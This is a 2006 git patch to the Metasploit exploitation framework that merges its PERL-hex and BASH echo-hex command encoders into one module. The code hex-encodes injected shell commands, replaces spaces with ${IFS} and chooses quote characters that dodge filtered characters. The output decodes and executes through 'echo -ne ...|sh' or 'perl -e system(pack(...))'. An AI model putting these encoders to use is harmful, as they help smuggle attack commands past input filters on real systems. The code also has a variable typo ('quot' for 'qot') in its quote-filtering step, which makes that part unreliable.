From 4a14fa7e025742983111f3213b5153a7953fcb03 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Mon, 16 Jan 2006 02:32:30 +0000 Subject: [PATCH] Merged them into one git-svn-id: file:///home/svn/incoming/trunk@3376 4d416f70-5f16-0410-b530-b9f4589650da --- modules/encoders/cmd/generic_sh.rb | 85 +++++++++++++++++++++++++++ modules/encoders/cmd/hex_bash_echo.rb | 63 -------------------- modules/encoders/cmd/hex_perl.rb | 76 ------------------------ 3 files changed, 85 insertions(+), 139 deletions(-) delete mode 100644 modules/encoders/cmd/hex_bash_echo.rb delete mode 100644 modules/encoders/cmd/hex_perl.rb diff --git a/modules/encoders/cmd/generic_sh.rb b/modules/encoders/cmd/generic_sh.rb index 583b3ec59e..f7a4fb7e87 100644 --- a/modules/encoders/cmd/generic_sh.rb +++ b/modules/encoders/cmd/generic_sh.rb @@ -32,6 +32,91 @@ class GenericSh < Msf::Encoder return buf end + # + # Uses the perl command to hex encode the command string + # + def encode_block_perl(state, buf) + + hex = buf.unpack("H*") + cmd = 'perl -e ' + qot = ',-:.=+!@#$%^&' + + # Find a quoting character to use + state.badchars.unpack('C*') { |c| quot.delete(c.chr) } + + # Throw an error if we ran out of quotes + raise RuntimeError if qot.length == 0 + + sep = qot[0].chr + + # Convert spaces to IFS... + if (state.badchars.include?(" ")) + cmd.gsub!(/\s/, '${IFS}') + end + + # Can we use single quotes to enclose the command string? + if (state.badchars.include?("'")) + + if (state.badchars.match(/\(|\)/)) + + # No paranthesis... + raise RuntimeError + end + + cmd << "system\\(pack\\(qq#{sep}H\\*#{sep},#{hex}\\)\\)" + + else + if (state.badchars.match(/\(|\)/)) + if (state.badchars.include?(" ")) + # No spaces allowed, no paranthesis, give up... + raise RuntimeError + end + + cmd << "'system pack qq#{sep}H*#{sep},#{hex}'" + else + cmd << "'system(pack(qq#{sep}H*#{sep},#{hex}))'" + end + end + + return cmd + end + + # + # Uses bash's echo -ne command to hex encode the command string + # + def encode_block_bash_echo(state, buf) + + hex = '' + + # Can we use single quotes to enclose the echo arguments? + if (state.badchars.include?("'")) + hex = buf.unpack('C*').collect { |c| "\\\\\\x%.2x" % c }.join + else + hex = "'" + buf.unpack('C*').collect { |c| "\\x%.2x" % c }.join + "'" + end + + # Are pipe characters restricted? + if (state.badchars.include?("|")) + + # How about backticks? + if (state.badchars.include?("`")) + raise RuntimeError + else + buf = "`echo -ne #{hex}`" + end + else + buf = "echo -ne #{hex}|sh" + end + + # Remove spaces from the command string + if (state.badchars.include?(" ")) + buf.gsub!(/\s/, '${IFS}') + end + + return buf + end + + end end end end diff --git a/modules/encoders/cmd/hex_bash_echo.rb b/modules/encoders/cmd/hex_bash_echo.rb deleted file mode 100644 index 6db96600e9..0000000000 --- a/modules/encoders/cmd/hex_bash_echo.rb +++ /dev/null @@ -1,63 +0,0 @@ -require 'msf/core' - -module Msf -module Encoders -module Cmd - -class HexBashEcho < Msf::Encoder - - def initialize - super( - 'Name' => 'BASH echo -e Hex Encoding', - 'Version' => '$Revision$', - 'Description' => %q{ - This encoder uses the "-e" option available in recent - versions of BASH to encode the command string. This - encoder will only work on recent Linux distributions or - situations where a new version of BASH is used to inject - the supplied command string. - }, - 'Author' => 'hdm', - 'Platform' => 'linux', - 'Arch' => ARCH_CMD) - end - - - # - # Encodes the payload - # - def encode_block(state, buf) - - hex = '' - - # Can we use single quotes to enclose the echo arguments? - if (state.badchars.include?("'")) - hex = buf.unpack('C*').collect { |c| "\\\\\\x%.2x" % c }.join - else - hex = "'" + buf.unpack('C*').collect { |c| "\\x%.2x" % c }.join + "'" - end - - # Are pipe characters restricted? - if (state.badchars.include?("|")) - - # How about backticks? - if (state.badchars.include?("`")) - raise RuntimeError - else - buf = "`echo -ne #{hex}`" - end - else - buf = "echo -ne #{hex}|sh" - end - - # Remove spaces from the command string - if (state.badchars.include?(" ")) - buf.gsub!(/\s/, '${IFS}') - end - - return buf - end - -end - -end end end diff --git a/modules/encoders/cmd/hex_perl.rb b/modules/encoders/cmd/hex_perl.rb deleted file mode 100644 index 19953ab469..0000000000 --- a/modules/encoders/cmd/hex_perl.rb +++ /dev/null @@ -1,76 +0,0 @@ -require 'msf/core' - -module Msf -module Encoders -module Cmd - -class HexPerl < Msf::Encoder - - def initialize - super( - 'Name' => 'PERL Hex Encoding', - 'Version' => '$Revision$', - 'Description' => %q{ - This encoder uses the PERL interpreter to decode - and execute a command supplied in hex format. This encoder - should work on most Unix systems that have PERL version - 5.0 or above. - - }, - 'Author' => 'hdm', - 'Arch' => ARCH_CMD) - end - - - # - # Encodes the payload - # - def encode_block(state, buf) - - hex = buf.unpack("H*") - cmd = 'perl -e ' - qot = ',-:.=+!@#$%^&' - - # Find a quoting character to use - state.badchars.unpack('C*') { |c| quot.delete(c.chr) } - - # Throw an error if we ran out of quotes - raise RuntimeError if qot.length == 0 - - sep = qot[0].chr - - # Convert spaces to IFS... - if (state.badchars.include?(" ")) - cmd.gsub!(/\s/, '${IFS}') - end - - # Can we use single quotes to enclose the command string? - if (state.badchars.include?("'")) - - if (state.badchars.match(/\(|\)/)) - - # No paranthesis... - raise RuntimeError - end - - cmd << "system\\(pack\\(qq#{sep}H\\*#{sep},#{hex}\\)\\)" - - else - if (state.badchars.match(/\(|\)/)) - if (state.badchars.include?(" ")) - # No spaces allowed, no paranthesis, give up... - raise RuntimeError - end - - cmd << "'system pack qq#{sep}H*#{sep},#{hex}'" - else - cmd << "'system(pack(qq#{sep}H*#{sep},#{hex}))'" - end - end - - return cmd - end - -end - -end end end